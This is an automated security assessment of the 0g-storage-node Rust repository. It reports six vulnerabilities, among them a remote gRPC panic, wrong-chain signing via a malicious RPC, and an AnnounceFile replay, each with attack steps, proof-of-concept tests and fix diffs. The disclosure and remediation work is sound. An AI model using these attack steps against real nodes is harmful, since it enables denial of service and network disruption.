KAI Security Assessment: 0g-storage-node

KAI Security Assessment: 0g-storage-node

By KAI Security Team10.03.2026

We ran KAI Agent against the 0g-storage-node repository. The automated analysis examined 47 exploit candidates across the Rust-based decentralized storage node implementation, verifying 6 vulnerabilities including 2 High and 2 Medium severity findings with fixes generated and validated for 4 of them.

Executive Summary

MetricValue
Repository0g-storage-node
Exploit Candidates47
Verified Exploits6
Rejected4

Severity Breakdown

SeverityCount
High2
Medium2
Unrated2

Verified Vulnerabilities

[HIGH] Remote gRPC Panic via Missing Proto Fields in SegmentWithProof

Severity: High

Affected File: node/rpc/src/types.rs

Affected Function: impl TryFrom<zgs_grpc_proto::SegmentWithProof> for SegmentWithProof::try_from

Description

gRPC UploadSegmentsByTxSeq can remotely panic the server due to unwrap() on missing SegmentWithProof.root/proof in TryFrom conversion, enabling request-triggered DoS.

Attack Steps

  1. Connect to the node's gRPC listener (default 0.0.0.0:50051)
  2. Call ZgsGrpcService/UploadSegmentsByTxSeq with any tx_seq
  3. In the request, include at least one SegmentWithProof message where the 'root' field is omitted (so it decodes as None in Rust Option), and/or omit the 'proof' field
  4. Server-side, upload_segments_by_tx_seq converts each proto segment via SegmentWithProof::try_from(grpc_segment)
  5. The conversion executes grpc_segment.root.unwrap() and grpc_segment.proof.unwrap(), which panics when the field is missing
  6. Repeat malformed requests to repeatedly trigger panics (request-task DoS; process crash possible depending on panic handling/build settings)

Proof of Concept

python
#!/usr/bin/env python3
import re
from pathlib import Path
import sys
ROOT = Path(__file__).resolve().parents[1]
types_path = ROOT / "node/rpc/src/types.rs"
impl_path = ROOT / "node/rpc/src/zgs_grpc/impl.rs"
types_src = types_path.read_text(encoding="utf-8")
impl_src = impl_path.read_text(encoding="utf-8")
def must_find(pattern: str, text: str, label: str):
    m = re.search(pattern, text, flags=re.MULTILINE)
    if not m:
        print(f"[FAIL] did not find {label} / pattern: {pattern}")
        sys.exit(1)
    return m.group(0)
# Primary vulnerable unwraps
hit_root = must_find(r"grpc_segment\.root\.unwrap\(\)", types_src, "grpc_segment.root.unwrap()")
hit_proof = must_find(r"grpc_segment\.proof\.unwrap\(\)", types_src, "grpc_segment.proof.unwrap()")
# Confirm the unwraps are within the expected TryFrom impl for SegmentWithProof
hit_impl_header = must_find(
    r"impl\s+TryFrom<zgs_grpc_proto::SegmentWithProof>\s+for\s+SegmentWithProof\s*{",
    types_src,
    "TryFrom<proto::SegmentWithProof> for SegmentWithProof header",
)
# Affected handler calls try_from and does not catch panics
hit_handler = must_find(
    r"async\s+fn\s+upload_segments_by_tx_seq\s*\(",
    impl_src,
    "upload_segments_by_tx_seq method signature",
)
hit_call = must_find(
    r"RpcSegment::try_from\(s\)",
    impl_src,
    "RpcSegment::try_from(s) call in handler",
)
# Heuristic: ensure there's no catch_unwind in handler file
if "catch_unwind" in impl_src:
    print("[WARN] found catch_unwind in impl.rs; manual review needed")
    sys.exit(2)
print("[OK] Confirmed unwrap() on optional proto fields in SegmentWithProof::try_from:")
print("     ", hit_root.strip())
print("     ", hit_proof.strip())
print("[OK] Confirmed UploadSegmentsByTxSeq handler calls RpcSegment::try_from(s) without panic catching.")
print("     ", hit_call.strip())
print()
print("Impact: A gRPC client can omit `SegmentWithProof.root` and/or `SegmentWithProof.proof` in")
print("UploadSegmentsByTxSeqRequest.segments; prost decodes omitted message fields as None;")
print("the unwrap() will panic, causing request-triggered DoS (task panic / possible process crash).")

Recommended Fix

diff
diff --git a/node/rpc/src/types.rs b/node/rpc/src/types.rs
index b072cc0..c619dab 100644
--- a/node/rpc/src/types.rs
+++ b/node/rpc/src/types.rs
@@ -129,13 +129,16 @@ impl TryFrom<zgs_grpc_proto::SegmentWithProof> for SegmentWithProof {
     type Error = GrpcStatus;

     fn try_from(grpc_segment: zgs_grpc_proto::SegmentWithProof) -> Result<Self, GrpcStatus> {
-        let root = grpc_segment.root.unwrap().try_into()?;
+        let root = grpc_segment
+            .root
+            .ok_or_else(|| GrpcStatus::invalid_argument("missing field: root"))?
+            .try_into()?;
         let data = grpc_segment.data;
         // index is u64 in proto, usize in app
         let index = grpc_segment.index.try_into().map_err(|_| {
             GrpcStatus::invalid_argument(format!("Invalid segment index: {}", grpc_segment.index))
         })?;
-        let proof = grpc_segment.proof.unwrap().try_into()?;
+        let proof = grpc_segment
+            .proof
+            .ok_or_else(|| GrpcStatus::invalid_argument("missing field: proof"))?
+            .try_into()?;

[HIGH] Chain ID Truncation Enables Wrong-Chain Signing via Malicious RPC

Severity: High

Affected File: node/miner/src/config.rs

Affected Function: make_signing_provider

Description

Miner signs transactions with chain_id taken from the RPC response and truncated (U256->u64 via as_u64), so a malicious/MITM RPC can force wrong-chain signing (persistent submission failure / wasted gas on unintended network).

Attack Steps

  1. Attacker controls victim miner's JSON-RPC endpoint or performs MITM attack (especially over http://)
  2. Attacker answers eth_chainId with an unexpected value (e.g., a different chain, or >2^64 to trigger truncation when as_u64() is used)
  3. Miner constructs LocalWallet with with_chain_id(chain_id.as_u64())
  4. All submissions are signed for the attacker-chosen chain-id domain, causing invalid signatures/rejected txs on the intended chain, or transactions being broadcast to/paid on an unintended chain served by the attacker RPC
  5. Miner continuously retries/submits and loses liveness (and possibly funds via fees on the wrong network)

Proof of Concept

rust
// Standalone PoC crate: includes the vulnerable MinerConfig implementation verbatim,
// but provides minimal stand-ins for `storage::config::ShardConfig` and `contract_wrapper::SubmitConfig`
// so we don't need to compile the full workspace (which pulls rocksdb/bindgen).
pub mod storage {
    pub mod config {
        #[derive(Clone, Copy, Debug, Eq, PartialEq)]
        pub struct ShardConfig {
            pub shard_id: usize,
            pub num_shard: usize,
        }
        impl Default for ShardConfig {
            fn default() -> Self {
                Self {
                    shard_id: 0,
                    num_shard: 1,
                }
            }
        }
    }
}
pub mod contract_wrapper {
    #[derive(Clone, Copy, Debug)]
    pub struct SubmitConfig {
        pub initial_gas_price: Option<u64>,
        pub max_gas_price: Option<u64>,
        pub max_gas: Option<u64>,
        pub gas_increase_factor: Option<u64>,
        pub max_retries: Option<usize>,
        pub interval_secs: Option<u64>,
    }
    impl Default for SubmitConfig {
        fn default() -> Self {
            Self {
                initial_gas_price: None,
                max_gas_price: None,
                max_gas: None,
                gas_increase_factor: Some(11),
                max_retries: Some(5),
                interval_secs: Some(2),
            }
        }
    }
}
// Pull in the vulnerable implementation exactly as-shipped.
include!("../../../node/miner/src/config.rs");
#[cfg(test)]
mod poc_tests {
    use super::*;
    use std::io::{Read, Write};
    use std::net::{TcpListener, TcpStream};
    use std::thread;
    use std::time::Duration;
    /// Minimal HTTP JSON-RPC server that responds only to `eth_chainId`.
    /// It returns the attacker-controlled chain id specified.
    fn start_mock_rpc(chain_id_hex: &'static str) -> String {
        let listener = TcpListener::bind("127.0.0.1:0").expect("bind");
        let addr = listener.local_addr().expect("local_addr");
        thread::spawn(move || {
            for stream in listener.incoming().take(10) {
                if let Ok(stream) = stream {
                    let _ = handle_conn(stream, chain_id_hex);
                }
            }
        });
        format!("http://{}", addr)
    }
    fn handle_conn(mut stream: TcpStream, chain_id_hex: &str) -> Result<(), String> {
        stream
            .set_read_timeout(Some(Duration::from_millis(500)))
            .map_err(|e| format!("set_read_timeout: {e:?}"))?;
        // Read request (best-effort).
        let mut buf = Vec::with_capacity(8192);
        let mut tmp = [0u8; 4096];
        loop {
            match stream.read(&mut tmp) {
                Ok(0) => break,
                Ok(n) => {
                    buf.extend_from_slice(&tmp[..n]);
                    if buf.windows(4).any(|w| w == b"\r\n\r\n") && buf.len() > 16 {
                        break;
                    }
                }
                Err(_) => break,
            }
        }
        let req = String::from_utf8_lossy(&buf);
        // Extract numeric JSON-RPC id if present (ethers uses numeric ids).
        let id = extract_jsonrpc_id(&req).unwrap_or_else(|| "1".to_string());
        let body = format!(r#"{{"jsonrpc":"2.0","id":{},"result":"{}"}}"#, id, chain_id_hex);
        let resp = format!(
            "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{}",
            body.len(),
            body
        );
        stream
            .write_all(resp.as_bytes())
            .map_err(|e| format!("write: {e:?}"))?;
        Ok(())
    }
    fn extract_jsonrpc_id(req: &str) -> Option<String> {
        let idx = req.find("\"id\"")?;
        let after = &req[idx..];
        let colon = after.find(':')?;
        let mut chars = after[colon + 1..].trim_start().chars();
        let mut out = String::new();
        for c in &mut chars {
            if c.is_ascii_digit() {
                out.push(c);
            } else {
                break;
            }
        }
        if out.is_empty() {
            None
        } else {
            Some(out)
        }
    }
    #[tokio::test]
    async fn attacker_controls_wallet_chain_id() {
        // Attacker lies about chain-id to force wrong-chain signing domain.
        let rpc_url = start_mock_rpc("0x2a"); // 42
        let cfg = MinerConfig::new(
            None,
            Some(H256::from_low_u64_be(1)), // valid secp256k1 secret key (non-zero)
            rpc_url,
            Address::zero(),
            Address::zero(),
            0,
            1,
            1,
            ShardConfig::default(),
            0,
            0,
            0,
            SubmitConfig::default(),
        )
        .expect("MinerConfig::new");
        let middleware = cfg.make_signing_provider().await.expect("make_signing_provider");
        assert_eq!(middleware.signer().chain_id(), 42);
    }
    #[tokio::test]
    async fn overflow_chain_id_panics() {
        // On this dependency set, U256::as_u64 panics on overflow.
        // Attacker-controlled RPC can crash miner init by returning a >u64 chain id.
        let rpc_url = start_mock_rpc("0x10000000000000001"); // 2^64 + 1
        let cfg = MinerConfig::new(
            None,
            Some(H256::from_low_u64_be(1)),
            rpc_url,
            Address::zero(),
            Address::zero(),
            0,
            1,
            1,
            ShardConfig::default(),
            0,
            0,
            0,
            SubmitConfig::default(),
        )
        .expect("MinerConfig::new");
        let jh = tokio::spawn(async move {
            // This should panic inside make_signing_provider when calling chain_id.as_u64().
            let _ = cfg.make_signing_provider().await;
        });
        let join_res = jh.await;
        assert!(join_res.is_err(), "task should fail (panic expected)");
        assert!(join_res.unwrap_err().is_panic(), "failure should be a panic");
    }
}

Recommended Fix

diff
--- a/node/miner/src/config.rs
+++ b/node/miner/src/config.rs
@@ -90,7 +90,12 @@
             .map_err(|e| format!("Unable to get chain_id: {:?}", e))?;
         let secret_key = SecretKey::from_bytes(self.miner_key.as_ref().into())
             .map_err(|e| format!("Cannot parse private key: {:?}", e))?;
-        let signer = LocalWallet::from(secret_key).with_chain_id(chain_id.as_u64());
+        let chain_id_u64 = if chain_id > ethers::types::U256::from(u64::MAX) {
+            return Err(format!("chain_id {:?} does not fit into u64", chain_id));
+        } else {
+            chain_id.as_u64()
+        };
+        let signer = LocalWallet::from(secret_key).with_chain_id(chain_id_u64);
         let middleware = SignerMiddleware::new(provider, signer);

         Ok(middleware)

[MEDIUM] Persistent Crash Loop from Malformed Merkle Node Bytes in FlowStore

Severity: Medium

Affected File: node/storage/src/log_store/flow_store.rs

Affected Function: FlowDBStore::get_node

Description

FlowStore panics on malformed merkle-node bytes read from the DB because it uses try_into().unwrap() and OptionalHash::from_bytes(...).unwrap(), enabling a persistent crash loop if the DB column is poisoned (snapshot import/corruption).

Attack Steps

  1. Provide or cause the node to load a poisoned DB/snapshot containing invalid values in the COL_FLOW_MPT_NODES column (wrong length or invalid OptionalHash encoding)
  2. Trigger any code path that calls FlowDBStore::get_node for the poisoned key (normal merkle operations)
  3. The read path executes v.as_slice().try_into().unwrap() or OptionalHash::from_bytes(...).unwrap(), panics, and the node crashes repeatedly on restart

Proof of Concept

rust
// --- PoC: FlowDBStore::get_node panics on malformed bytes in COL_FLOW_MPT_NODES ---
// This demonstrates a persistent crash loop risk if the DB/snapshot is poisoned with invalid bytes.
use super::flow_store::FlowDBStore;
use crate::log_store::log_manager::{COL_FLOW_MPT_NODES, COL_NUM};
use crate::ZgsKeyValueDB;
use append_merkle::NodeDatabase;
use kvdb_memorydb;
use std::panic::{catch_unwind, AssertUnwindSafe};
use std::sync::Arc;
fn encode_mpt_node_key_test(layer_index: usize, position: usize) -> Vec<u8> {
    let mut key = layer_index.to_be_bytes().to_vec();
    key.extend_from_slice(&position.to_be_bytes());
    key
}
#[test]
fn poc_flowstore_get_node_panics_on_short_value() {
    // Arrange: create in-memory kvdb and poison the COL_FLOW_MPT_NODES value with wrong length.
    let db = Arc::new(kvdb_memorydb::create(COL_NUM));
    let store = FlowDBStore::new(db.clone());
    let key = encode_mpt_node_key_test(1, 2);
    db.put(COL_FLOW_MPT_NODES, &key, b"too_short")
        .expect("db put should succeed");
    // Act + Assert: get_node panics due to `try_into().unwrap()` on a non-33-byte slice.
    let panicked = catch_unwind(AssertUnwindSafe(|| {
        let _ = store.get_node(1, 2);
    }))
    .is_err();
    assert!(panicked, "expected get_node to panic on short DB value");
}
#[test]
fn poc_flowstore_get_node_panics_on_invalid_optionalhash_flag() {
    // Arrange: poison DB with correct length (33) but invalid OptionalHash flag byte.
    let db = Arc::new(kvdb_memorydb::create(COL_NUM));
    let store = FlowDBStore::new(db.clone());
    let key = encode_mpt_node_key_test(3, 4);
    let mut v = [0u8; 33];
    v[0] = 2; // invalid flag (must be 0 or 1 per OptionalHash::from_bytes)
    db.put(COL_FLOW_MPT_NODES, &key, &v[..])
        .expect("db put should succeed");
    // Act + Assert: get_node panics due to `OptionalHash::from_bytes(...).unwrap()`.
    let panicked = catch_unwind(AssertUnwindSafe(|| {
        let _ = store.get_node(3, 4);
    }))
    .is_err();
    assert!(panicked, "expected get_node to panic on invalid OptionalHash encoding");
}

Recommended Fix

diff
--- a/node/storage/src/log_store/flow_store.rs
+++ b/node/storage/src/log_store/flow_store.rs
@@ -598,10 +598,33 @@

impl NodeDatabase<OptionalHash> for FlowDBStore {
    fn get_node(&self, layer: usize, pos: usize) -> Result<Option<OptionalHash>> {
-        Ok(self
+        let raw = self
            .kvdb
-            .get(COL_FLOW_MPT_NODES, &encode_mpt_node_key(layer, pos))?
-            .map(|v| OptionalHash::from_bytes(v.as_slice().try_into().unwrap()).unwrap()))
+            .get(COL_FLOW_MPT_NODES, &encode_mpt_node_key(layer, pos))?;
+        let Some(v) = raw else {
+            return Ok(None);
+        };
+
+        let bytes: &[u8; 33] = match v.as_slice().try_into() {
+            Ok(b) => b,
+            Err(_) => {
+                error!(
+                    layer,
+                    pos,
+                    len = v.len(),
+                    "invalid merkle node byte length in DB (expected 33)"
+                );
+                return Ok(None);
+            }
+        };
+
+        match OptionalHash::from_bytes(bytes) {
+            Ok(node) => Ok(Some(node)),
+            Err(e) => {
+                error!(layer, pos, err = %e, "invalid merkle node bytes in DB");
+                Ok(None)
+            }
+        }
    }

    fn get_layer_size(&self, layer: usize) -> Result<Option<usize>> {

[MEDIUM] AnnounceFile Replay Attack via Unsigned resend_timestamp

Severity: Medium

Affected File: node/router/src/libp2p_event_handler.rs

Affected Function: construct_announce_file_message + on_announce_file

Description

AnnounceFile freshness uses resend_timestamp (apparently not covered by the signature) instead of the signed inner timestamp, allowing indefinite replay of stale-but-once-valid announcements (cache poisoning / routing degradation).

Attack Steps

  1. Attacker can observe any valid SignedAnnounceFile on pubsub (or otherwise obtain one) and can republish gossipsub messages
  2. Attacker records a valid SignedAnnounceFile that would normally age out
  3. After it becomes stale, attacker republishes the same signed payload but sets resend_timestamp = now() (the code sets signed.resend_timestamp = timestamp after signing, implying it is mutable and not signature-protected)
  4. Victim verifies signature on the signed portion and checks freshness using msg.resend_timestamp, so the replay passes the timeout window
  5. Victim accepts and inserts it into file_location_cache, keeping stale locations alive and repeatedly steering lookups/connection attempts toward attacker-chosen or dead endpoints
  6. Attacker repeats to keep poisoned entries perpetually 'fresh' across the network

Proof of Concept

rust
#[tokio::test]
async fn test_on_pubsub_announce_file_replay_by_bumping_resend_timestamp() {
    let mut ctx = Context::default();
    let handler = ctx.new_handler();
    let (alice, bob) = (PeerId::random(), PeerId::random());
    let id = MessageId::new(b"dummy message");
    let tx = TxID::random_hash(4242);
    // Create an announcement with an *old* inner timestamp that should be stale.
    let old_timestamp =
        timestamp_now() - PUBSUB_TIMEOUT_NETWORK.num_seconds() as u32 - 100;
    let peer_id = *ctx.network_globals.peer_id.read();
    let addr = ctx
        .network_globals
        .listen_multiaddrs
        .read()
        .first()
        .unwrap()
        .clone();
    let timed = TimedMessage {
        inner: network::types::AnnounceFile {
            tx_ids: vec![tx],
            shard_config: handler.store.get_store().get_shard_config().into(),
            peer_id: peer_id.into(),
            at: addr.into(),
        },
        timestamp: old_timestamp,
    };
    // Sign message (signature covers `timed`, i.e., the inner timestamp), but NOT resend_timestamp.
    let mut signed = network::types::SignedMessage::sign_message(timed, &ctx.keypair).unwrap();
    // Case 1: stale resend_timestamp => ignored.
    signed.resend_timestamp = old_timestamp;
    let message = PubsubMessage::AnnounceFile(vec![signed.clone()]);
    let res = handler.on_pubsub_message(alice, bob, &id, message).await;
    assert!(matches!(res, MessageAcceptance::Ignore));
    assert_eq!(ctx.file_location_cache.get_all(tx).len(), 0);
    assert!(matches!(ctx.sync_recv.try_recv(), Err(TryRecvError::Empty)));
    // Case 2: replay exact same signed payload, only bump resend_timestamp => accepted.
    signed.resend_timestamp = timestamp_now();
    let message = PubsubMessage::AnnounceFile(vec![signed]);
    let res = handler.on_pubsub_message(alice, bob, &id, message).await;
    // This demonstrates the vulnerability: stale message becomes acceptable by changing only resend_timestamp.
    assert!(matches!(res, MessageAcceptance::Accept));
    // ensure notify to sync layer
    match ctx.sync_recv.try_recv() {
        Ok(Notification(SyncMessage::AnnounceFileGossip { tx_id, peer_id: got_peer_id, addr: got_addr })) => {
            assert_eq!(tx_id, tx);
            assert_eq!(got_peer_id, peer_id);
            assert_eq!(got_addr, *ctx.network_globals.listen_multiaddrs.read().first().unwrap());
        }
        Ok(_) => panic!("Unexpected sync message type received"),
        Err(e) => panic!("No sync message received: {:?}", e),
    }
    // ensure cache updated
    assert_eq!(ctx.file_location_cache.get_all(tx).len(), 1);
}

Recommended Fix

diff
diff --git a/tmp/orig_snap/libp2p_event_handler.rs b/node/router/src/libp2p_event_handler.rs
index 1d6bcd1..85dcb8b 100644
--- a/tmp/orig_snap/libp2p_event_handler.rs
+++ b/node/router/src/libp2p_event_handler.rs
@@ -806,6 +806,20 @@ impl Libp2pEventHandler {
             Err(_) => return MessageAcceptance::Reject,
         };

+        // verify signed timestamp (prevents replay-by-bumping resend_timestamp)
+        let signed_d = duration_since(
+            msg.inner.timestamp,
+            metrics::LIBP2P_HANDLE_PUBSUB_ANNOUNCE_FILE_LATENCY.clone(),
+        );
+        if signed_d < TOLERABLE_DRIFT.neg() || signed_d > *PUBSUB_TIMEOUT_NETWORK {
+            debug!(
+                ?signed_d,
+                %propagation_source,
+                "Invalid signed timestamp, ignoring AnnounceFile message"
+            );
+            metrics::LIBP2P_HANDLE_PUBSUB_ANNOUNCE_FILE_TIMEOUT.mark(1);
+            return MessageAcceptance::Ignore;
+        }
         // propagate gossip to peers
         let d = duration_since(
             msg.resend_timestamp,

[UNRATED] Sealer Main Loop CPU Hot-Spin

Severity: Unrated

Affected File: node/miner/src/sealer.rs

Affected Function: start loop + seal_iteration

Description

Sealer main loop can hot-spin at 100% CPU when seal_iteration() returns Ok(true) because throttling is never reset in that branch, enabling sustained local/remote-influenced DoS.

Attack Steps

  1. Victim runs the miner sealer; attacker can (directly or indirectly) influence the task source backing self.store.pull_seal_chunk(...) (e.g., via whatever network→store ingestion exists) and/or can influence the RPC/context readiness so fetch_context() often returns Ok(None) quickly
  2. Attacker causes the victim store to continuously report a non-empty set of seal tasks (so seal_iteration() does not take the Ok(false) path that resets the throttle)
  3. Attacker simultaneously causes each task to be non-sealable (e.g., context is 'not ready' so fetch_context(seal_index) returns Ok(None)), making the loop continue for each task without producing work
  4. seal_iteration() still returns Ok(true) (tasks existed), even if answers is empty
  5. In the start loop, the Ok(true) branch does not reset db_checker_throttle, so db_checker_throttle.is_elapsed() remains true
  6. The outer loop immediately runs another iteration with no sleep/backoff, producing a tight loop that burns CPU (and can also cause repeated DB/RPC access depending on the skipped path)

Proof of Concept

rust
/// PoC unit test (add to bottom of `node/miner/src/sealer.rs`)
///
/// Confirms hot-spin: if `seal_iteration()` keeps returning Ok(true) (tasks exist) but produces no
/// answers (context not ready => fetch_context returns Ok(None)), the `start()` loop never resets
/// db_checker_throttle in the Ok(true) branch and will re-run sealing iterations as fast as possible.
#[cfg(test)]
mod hot_spin_tests {
    use super::*;
    use std::str::FromStr;
    use std::sync::{atomic::{AtomicUsize, Ordering}, Arc};
    use append_merkle::OptionalHash;
    use ethers::prelude::{Http, Provider, RetryClient, RetryClientBuilder};
    use ethers::providers::HttpRateLimitRetryPolicy;
    use ethers::types::Address;
    use shared_types::{
        Chunk, ChunkArray, ChunkArrayWithProof, ChunkWithProof, DataRoot, FlowRangeProof,
        Transaction,
    };
    use storage::config::ShardConfig;
    use storage::error::Result;
    use storage::log_store::config::{ConfigTx, Configurable};
    use storage::log_store::load_chunk::EntryBatch;
    use storage::log_store::tx_store::{BlockHashAndSubmissionIndex, TxStatus};
    use storage::log_store::{LogStoreChunkRead, LogStoreChunkWrite, LogStoreRead, LogStoreWrite, MineLoadChunk, SealAnswer, SealTask};
    /// Dummy synchronous store used underneath `storage_async::Store`.
    ///
    /// Behavior:
    /// - `pull_seal_chunk(..)` always returns a non-empty task list.
    /// - `submit_seal_result(..)` is a no-op.
    ///
    /// This forces `seal_iteration()` to return Ok(true) every time while `fetch_context()` will
    /// return Ok(None) quickly (because Sealer.last_context_flow_length = 0), creating empty answers.
    #[derive(Default)]
    struct DummyLogStore {
        pull_calls: AtomicUsize,
        submit_calls: AtomicUsize,
        shard_config: ShardConfig,
    }

    #[test]
    fn sealer_start_loop_hot_spins_when_seal_iteration_ok_true() {
        // Use the task_executor crate's built-in test runtime wrapper.
        let tr = task_executor::test_utils::TestRuntime::default();
        let dummy: Arc<DummyLogStore> = Arc::new(DummyLogStore::default());
        let dummy_for_assert = dummy.clone();
        // Run everything inside the TestRuntime's tokio runtime.
        tr.runtime.block_on(async move {
            // storage_async::Store wraps the synchronous log-store and uses TaskExecutor to offload work.
            let log_store: Arc<dyn storage::log_store::Store> = dummy.clone();
            let store = Arc::new(storage_async::Store::new(log_store, tr.task_executor.clone()));
            // Provider that will fail quickly; we keep last_context_flow_length=0 so fetch_context short-circuits
            // and does not hit the network in seal_iteration().
            let http = Http::from_str("http://127.0.0.1:1").expect("valid URL");
            let provider: Arc<Provider<RetryClient<Http>>> = Arc::new(Provider::new(
                RetryClientBuilder::default()
                    .rate_limit_retries(0)
                    .timeout_retries(0)
                    .initial_backoff(Duration::from_millis(0))
                    .build(http, Box::new(HttpRateLimitRetryPolicy)),
            ));
            let flow_contract = ZgsFlow::new(Address::zero(), provider);
            let sealer = Sealer {
                flow_contract,
                store,
                context_cache: Default::default(),
                last_context_flow_length: 0,
                miner_id: H256::zero(),
            };
            let handle = tokio::spawn(async move {
                sealer.start().await;
            });
            // Let it run briefly.
            tokio::time::sleep(Duration::from_millis(200)).await;
            handle.abort();
            // If db_checker_throttle were reset on Ok(true), we'd see ~0-1 pulls in 200ms.
            // Because it is *not* reset, it hot-spins and we observe many pulls.
            let pulls = dummy_for_assert.pull_count();
            assert!(pulls > 20, "expected hot spin (many pull_seal_chunk calls); got pulls={pulls}");
        });
    }
}

Recommended Fix

No suggested diff provided for this vulnerability.

[UNRATED] Sync Manager Panic on Shutdown Channel Error

Severity: Unrated

Affected File: node/log_entry_sync/src/sync_manager/mod.rs

Affected Function: spawn (run_and_log error callback)

Description

Sync manager error-handling path panics because it calls shutdown_sender.try_send(...).expect("shutdown send error") on a possibly closed/full channel, turning a recoverable provider-induced failure into a crash.

Attack Steps

  1. Induce a log-sync failure by making the configured provider return errors/timeouts for required calls (e.g., eth_getLogs / eth_getBlockByNumber)
  2. Ensure the shutdown receiver is dropped or the bounded shutdown channel is full (e.g., concurrent shutdown already in progress, or repeated failures)
  3. When the error callback runs, try_send returns Err and .expect("shutdown send error") panics, crashing the sync task/process

Proof of Concept

rust
// poc_shutdown_expect/Cargo.toml
[package]
name = "poc_shutdown_expect"
version = "0.1.0"
edition = "2021"
[dependencies]
anyhow = "1"
futures = "0.3"
tokio = { version = "1", features = ["macros", "rt"] }
task_executor = { path = "../common/task_executor" }
[workspace]
// poc_shutdown_expect/src/lib.rs
use std::fmt::Debug;
use std::future::Future;
/// Copy of the `run_and_log` helper from:
/// node/log_entry_sync/src/sync_manager/mod.rs
async fn run_and_log<R, E>(
    mut on_error: impl FnMut(),
    f: impl Future<Output = std::result::Result<R, E>> + Send,
) -> Option<R>
where
    E: Debug,
{
    match f.await {
        Err(_e) => {
            // In production this logs and then runs the error callback.
            on_error();
            None
        }
        Ok(r) => Some(r),
    }
}
#[cfg(test)]
mod tests {
    use super::*;
    use anyhow::anyhow;
    use futures::channel::mpsc;
    use task_executor::ShutdownReason;
    /// Confirms the vulnerable pattern exists in the target file.
    #[test]
    fn source_contains_expect_on_shutdown_send() {
        // Path relative to this PoC crate.
        const SRC: &str = include_str!("../../node/log_entry_sync/src/sync_manager/mod.rs");
        assert!(
            SRC.contains(r#".expect("shutdown send error")"#),
            "target file no longer contains `.expect(\"shutdown send error\")`"
        );
        assert!(
            SRC.contains("try_send(ShutdownReason::Failure(\"log sync failure\"))")
                || SRC.contains("try_send(ShutdownReason::Failure(\"log sync failure\"))".replace("\\", "").as_str()),
            "target file no longer contains try_send(Failure(\"log sync failure\")) pattern"
        );
    }
    /// Runnable crash reproduction: if the shutdown receiver is dropped/closed,
    /// `try_send(..).expect("shutdown send error")` panics.
    #[tokio::test]
    #[should_panic(expected = "shutdown send error")]
    async fn panic_on_closed_shutdown_channel() {
        let (mut shutdown_sender, shutdown_receiver) = mpsc::channel::<ShutdownReason>(1);
        // Simulate shutdown already underway: receiver is gone, channel is closed.
        drop(shutdown_receiver);
        let _ = run_and_log(
            move || {
                shutdown_sender
                    .try_send(ShutdownReason::Failure("log sync failure"))
                    .expect("shutdown send error")
            },
            async { Err::<(), _>(anyhow!("provider induced failure")) },
        )
        .await;
    }
}

Recommended Fix

No suggested diff provided for this vulnerability.


This assessment was conducted using KAI's automated security analysis platform. Each verified vulnerability includes proof-of-concept code demonstrating exploitability and recommended fixes to address the identified security issues.

Copyright © 2026 DRIA. All Rights Reserved.
Follow Kai: